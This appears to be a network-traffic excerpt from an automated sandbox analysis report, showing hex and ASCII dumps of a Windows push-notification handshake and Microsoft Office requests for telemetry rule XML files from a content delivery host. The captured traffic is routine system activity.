                                                        2024-11-12 15:27:18 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-11-12 15:27:18 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 39 75 75 34 6f 4b 2f 4d 66 30 61 55 2f 69 38 4d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 61 62 32 38 66 66 61 65 34 65 32 37 31 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 37 48 38 66 37 55 30 55 33 58 50 6e 6c 46 42 54 37 41 34 62 47 36 44 70 6a 4e 57 77 42 59 2f 59 33 57 67 4b 61 6a 39 54 41 52 38 70 32 64 34 4b 33 68 50 6c 6e 45 70 6a 33 68 41 53 42 46 67 56 47 34 5a 33 54 6d 4a 63 74 76 39 54 7a 71 47 61 59 52 38 31 65 38 42 4a 48 76 6b 63 4f 6b 72 56 39 65 39 4c 63 4d 6b 52 76 33 79 34
                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 9uu4oK/Mf0aU/i8M.2Context: ecab28ffae4e271e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ7H8f7U0U3XPnlFBT7A4bG6DpjNWwBY/Y3WgKaj9TAR8p2d4K3hPlnEpj3hASBFgVG4Z3TmJctv9TzqGaYR81e8BJHvkcOkrV9e9LcMkRv3y4
                                                        2024-11-12 15:27:18 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 39 75 75 34 6f 4b 2f 4d 66 30 61 55 2f 69 38 4d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 61 62 32 38 66 66 61 65 34 65 32 37 31 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 9uu4oK/Mf0aU/i8M.3Context: ecab28ffae4e271e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-11-12 15:27:19 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-11-12 15:27:19 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4a 47 32 39 42 48 4c 48 78 6b 43 69 6c 58 65 71 73 53 57 59 6f 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: JG29BHLHxkCilXeqsSWYog.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.64985013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:18 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:19 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:18 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1401
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                        ETag: "0x8DC582BE055B528"
                                                        x-ms-request-id: d0aff24d-301e-000c-58d2-2c323f000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152718Z-16547b76f7flf9g6hC1DFWmcx800000006eg000000001cwm
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:19 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.64985113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:19 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:19 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:19 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1364
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                        ETag: "0x8DC582BE1223606"
                                                        x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152719Z-16547b76f7fdf69shC1DFWcpd00000000frg00000000chy7
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:19 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.64985213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:19 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:19 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:19 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1397
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                        ETag: "0x8DC582BE7262739"
                                                        x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152719Z-16547b76f7fxsvjdhC1DFWprrs0000000fng00000000k96f
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:19 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.64985313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:19 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:19 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:19 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1360
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                        ETag: "0x8DC582BDDEB5124"
                                                        x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152719Z-16547b76f7f22sh5hC1DFWyb4w0000000ftg000000006bb1
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:19 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.64985413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:19 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:19 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:19 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1403
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                        ETag: "0x8DC582BDCB4853F"
                                                        x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152719Z-16547b76f7fcrtpchC1DFW52e80000000fw000000000ab13
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:19 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.64985513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:19 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:19 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:19 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1366
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                        ETag: "0x8DC582BDB779FC3"
                                                        x-ms-request-id: 934c77ff-c01e-0079-30a7-34e51a000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152719Z-17df447cdb54ntx4hC1DFW2k400000000ckg000000003ege
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:19 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.64985713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:19 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:20 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:20 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1360
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                        ETag: "0x8DC582BDD74D2EC"
                                                        x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152719Z-16547b76f7fxsvjdhC1DFWprrs0000000fr000000000e59f
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:20 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.64985813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:20 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:20 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:20 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1427
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                        ETag: "0x8DC582BE56F6873"
                                                        x-ms-request-id: a35c742a-a01e-000d-06a1-34d1ea000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152720Z-17df447cdb5vp9l9hC1DFW5hw800000007wg0000000028w6
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:20 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.64985913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:20 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:20 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:20 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1390
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                        ETag: "0x8DC582BE3002601"
                                                        x-ms-request-id: 4db10895-001e-0049-15a1-345bd5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152720Z-17df447cdb5qkskwhC1DFWeeg40000000cs0000000003hs2
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:20 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


